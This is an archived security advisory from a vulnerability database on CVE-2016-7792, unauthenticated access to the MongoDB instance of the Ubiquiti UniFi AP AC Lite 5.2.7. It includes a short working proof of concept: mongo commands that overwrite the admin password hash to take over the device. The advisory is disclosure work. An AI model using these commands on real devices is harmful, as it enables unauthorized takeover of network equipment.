Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTim SchughartPACKETSTORM:138928
HistorySep 30, 2016 - 12:00 a.m.

Ubiquiti UniFi AP AC Lite 5.2.7 Improper Access Control

2016-09-3000:00:00
Tim Schughart
packetstormsecurity.com
32

0.006 Low

EPSS

Percentile

78.8%

JSON
`Product: UniFi AP AC Lite  
Vendor: Ubiquiti Networks Inc.   
  
Internal reference: ? (Bug ID)  
Vulnerability type: Incorrect access control   
Vulnerable version: Unify 5.2.7 and possible other versions affected (not tested)  
Vulnerable component: Database  
Report confidence: yes  
Solution status: Not fixed by Vendor, the bug is a feature.   
Fixed versions: -  
Researcher credits: Tim Schughart, Immanuel BA$?r, Khanh Quoc Pham of ProSec Networks  
Solution date: -   
Public disclosure: 2016-09-30  
CVE reference: CVE-2016-7792  
CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H   
  
  
Vulnerability Details:  
You are able to connect to the access points database, because of an broken authentication (OWASP TOP10). So you are able to modify the database and read the data. An possible scenario you'll find in PoC section.   
  
Risk:  
An attacker gets access to the database and for e.g. is able to change the admins password, like you see in PoC below.   
  
PoC:   
1. Generate SHA512 Hash with e.g.  
mkpasswd -m sha-512  
  
2. Connect via network to database, e.g. :  
mongo --port 27117 --host target_ip  
  
3. Change password via command  
"db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":  
"$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"  
4. Login via web interface with new password  
  
  
Best regards / Mit freundlichen GrA1/4Aen   
  
  
Tim Schughart   
CEO / GeschA$?ftsfA1/4hrer   
  
--  
ProSec Networks e.K.   
Ellingshohl 82   
56077 Koblenz   
  
Website: https://www.prosec-networks.com   
E-Mail: [email protected]   
Mobile: +49 (0)157 7901 5826  
Phone: +49 (0)261 450 930 90   
  
"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, HRA 21625.a  
  
"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder RECHTLICH GESCHATZTE Informationen enthalten und ist ausschlieAlich fA1/4r den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, VervielfA$?ltigung oder Versendung ist strengstens verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung irrtA1/4mlich erhalten haben, informieren Sie bitte sofort den Absender, lAPschen diese E-Mail und vernichten alle Kopien. USt-IdNr.: DE290654714, Amtsgericht Koblenz, HRA 21625."  
  
`

Related

zdt 1
prion 1
cve 1
nvd 1
cvelist 1
zdt
zdt
Ubiquiti UniFi 5.2.7 Critical Vulnerability
2016-10-01 00:00:00
prion
prion
Code injection
2017-01-23 21:59:00
cve
cve
CVE-2016-7792
2017-01-23 21:59:02
nvd
nvd
CVE-2016-7792
2017-01-23 21:59:02
cvelist
cvelist
CVE-2016-7792
2017-01-23 21:00:00

0.006 Low

EPSS

Percentile

78.8%

JSON
Related for PACKETSTORM:138928
zdt1prion1cve1nvd1cvelist1